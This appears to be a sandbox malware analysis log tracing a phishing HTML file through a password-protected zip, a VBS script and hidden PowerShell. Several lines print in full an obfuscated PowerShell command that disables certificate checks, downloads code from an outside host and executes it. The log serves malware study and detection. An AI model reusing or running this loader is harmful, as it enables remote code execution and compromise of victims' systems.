Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_1026285186Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_1026285186\keys.jsonJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_1026285186\manifest.jsonJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_1026285186\LICENSEJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_1026285186\_metadata\Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_1026285186\_metadata\verified_contents.jsonJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping4940_1026285186\manifest.fingerprintJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\chrome_BITS_4940_163090370Jump to behavior
Source: Google.Widevine.CDM.dll.0.drStatic PE information: Number of sections : 12 > 10
Source: classification engineClassification label: mal92.phis.expl.evad.winHTML@50/41@15/7
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\430bc173-d568-4b25-b35a-96677460ca37.tmpJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6752:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7044:120:WilError_03
Source: C:\Windows\SysWOW64\unarchiver.exeFile created: C:\Users\user\AppData\Local\Temp\unarchiver.logJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs"
Source: C:\Windows\SysWOW64\cmd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\CfF7MWq7aG.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1836,i,5843688646892688928,17905010364784798591,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\SysWOW64\unarchiver.exe "C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\CfF7MWq7aG.zip"
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p" "C:\Users\user\Downloads\CfF7MWq7aG.zip"
Source: C:\Windows\SysWOW64\7za.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs"
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "echo $($KSJQTmC = $('{5}{4}{1}' -f $('uxhxeilT'.ToCharArray())); $((182,156,202,232,92,166,202,228,236,210,198,202,160,222,210,220,232,154,194,220,194,206,202,228,186,116,116,166,202,228,236,202,228,134,202,228,232,210,204,210,198,194,232,202,172,194,216,210,200,194,232,210,222,220,134,194,216,216,196,194,198,214,64,122,64,246,72,232,228,234,202,250,118,64,72,240,172,140,208,180,64,122,64,182,166,242,230,232,202,218,92,156,202,232,92,144,232,232,224,174,202,196,164,202,226,234,202,230,232,186,116,116,134,228,202,194,232,202,80,78,208,232,232,224,230,116,94,94,208,222,230,232,112,106,106,96,96,92,210,220,204,222,116,98,106,102,100,100,94,238,202,196,98,92,224,208,224,78,82,118,64,72,240,172,140,208,180,92,168,210,218,202,222,234,232,64,122,64,102,96,96,96,96,96,118,64,72,80,182,166,242,230,232,202,218,92,146,222,92,166,232,228,202,194,218,164,202,194,200,202,228,186,80,72,240,172,140,208,180,92,142,202,232,164,202,230,224,222,220,230,202,80,82,92,142,202,232,164,202,230,224,222,220,230,202,166,232,228,202,194,218,80,82,82,82,92,164,202,194,200,168,222,138,220,200,80,82,64,248,64,146,138,176)^^^|%{[char]($_/2)})-join'') ^^^| ^^^&($KSJQTmC) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $($KSJQTmC = $('{5}{4}{1}' -f $('uxhxeilT'.ToCharArray())); $((182,156,202,232,92,166,202,228,236,210,198,202,160,222,210,220,232,154,194,220,194,206,202,228,186,116,116,166,202,228,236,202,228,134,202,228,232,210,204,210,198,194,232,202,172,194,216,210,200,194,232,210,222,220,134,194,216,216,196,194,198,214,64,122,64,246,72,232,228,234,202,250,118,64,72,240,172,140,208,180,64,122,64,182,166,242,230,232,202,218,92,156,202,232,92,144,232,232,224,174,202,196,164,202,226,234,202,230,232,186,116,116,134,228,202,194,232,202,80,78,208,232,232,224,230,116,94,94,208,222,230,232,112,106,106,96,96,92,210,220,204,222,116,98,106,102,100,100,94,238,202,196,98,92,224,208,224,78,82,118,64,72,240,172,140,208,180,92,168,210,218,202,222,234,232,64,122,64,102,96,96,96,96,96,118,64,72,80,182,166,242,230,232,202,218,92,146,222,92,166,232,228,202,194,218,164,202,194,200,202,228,186,80,72,240,172,140,208,180,92,142,202,232,164,202,230,224,222,220,230,202,80,82,92,142,202,232,164,202,230,224,222,220,230,202,166,232,228,202,194,218,80,82,82,82,92,164,202,194,200,168,222,138,220,200,80,82,64,248,64,146,138,176)^|%{[char]($_/2)})-join'') ^| ^&($KSJQTmC) "
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1836,i,5843688646892688928,17905010364784798591,262144 /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\SysWOW64\unarchiver.exe "C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\CfF7MWq7aG.zip"Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p" "C:\Users\user\Downloads\CfF7MWq7aG.zip"Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\4sayhkzp.t1p\2025010453906.vbs" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "echo $($KSJQTmC = $('{5}{4}{1}' -f $('uxhxeilT'.ToCharArray())); $((182,156,202,232,92,166,202,228,236,210,198,202,160,222,210,220,232,154,194,220,194,206,202,228,186,116,116,166,202,228,236,202,228,134,202,228,232,210,204,210,198,194,232,202,172,194,216,210,200,194,232,210,222,220,134,194,216,216,196,194,198,214,64,122,64,246,72,232,228,234,202,250,118,64,72,240,172,140,208,180,64,122,64,182,166,242,230,232,202,218,92,156,202,232,92,144,232,232,224,174,202,196,164,202,226,234,202,230,232,186,116,116,134,228,202,194,232,202,80,78,208,232,232,224,230,116,94,94,208,222,230,232,112,106,106,96,96,92,210,220,204,222,116,98,106,102,100,100,94,238,202,196,98,92,224,208,224,78,82,118,64,72,240,172,140,208,180,92,168,210,218,202,222,234,232,64,122,64,102,96,96,96,96,96,118,64,72,80,182,166,242,230,232,202,218,92,146,222,92,166,232,228,202,194,218,164,202,194,200,202,228,186,80,72,240,172,140,208,180,92,142,202,232,164,202,230,224,222,220,230,202,80,82,92,142,202,232,164,202,230,224,222,220,230,202,166,232,228,202,194,218,80,82,82,82,92,164,202,194,200,168,222,138,220,200,80,82,64,248,64,146,138,176)^^^|%{[char]($_/2)})-join'') ^^^| ^^^&($KSJQTmC) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $($KSJQTmC = $('{5}{4}{1}' -f $('uxhxeilT'.ToCharArray())); $((182,156,202,232,92,166,202,228,236,210,198,202,160,222,210,220,232,154,194,220,194,206,202,228,186,116,116,166,202,228,236,202,228,134,202,228,232,210,204,210,198,194,232,202,172,194,216,210,200,194,232,210,222,220,134,194,216,216,196,194,198,214,64,122,64,246,72,232,228,234,202,250,118,64,72,240,172,140,208,180,64,122,64,182,166,242,230,232,202,218,92,156,202,232,92,144,232,232,224,174,202,196,164,202,226,234,202,230,232,186,116,116,134,228,202,194,232,202,80,78,208,232,232,224,230,116,94,94,208,222,230,232,112,106,106,96,96,92,210,220,204,222,116,98,106,102,100,100,94,238,202,196,98,92,224,208,224,78,82,118,64,72,240,172,140,208,180,92,168,210,218,202,222,234,232,64,122,64,102,96,96,96,96,96,118,64,72,80,182,166,242,230,232,202,218,92,146,222,92,166,232,228,202,194,218,164,202,194,200,202,228,186,80,72,240,172,140,208,180,92,142,202,232,164,202,230,224,222,220,230,202,80,82,92,142,202,232,164,202,230,224,222,220,230,202,166,232,228,202,194,218,80,82,82,82,92,164,202,194,200,168,222,138,220,200,80,82,64,248,64,146,138,176)^|%{[char]($_/2)})-join'') ^| ^&($KSJQTmC) "Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -Jump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\7za.exeSection loaded: 7z.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msxml3.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
Source: Binary string: Google.Widevine.CDM.dll.pdb source: Google.Widevine.CDM.dll.0.dr

Data Obfuscation

barindex
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "echo $($KSJQTmC = $('{5}{4}{1}' -f $('uxhxeilT'.ToCharArray())); 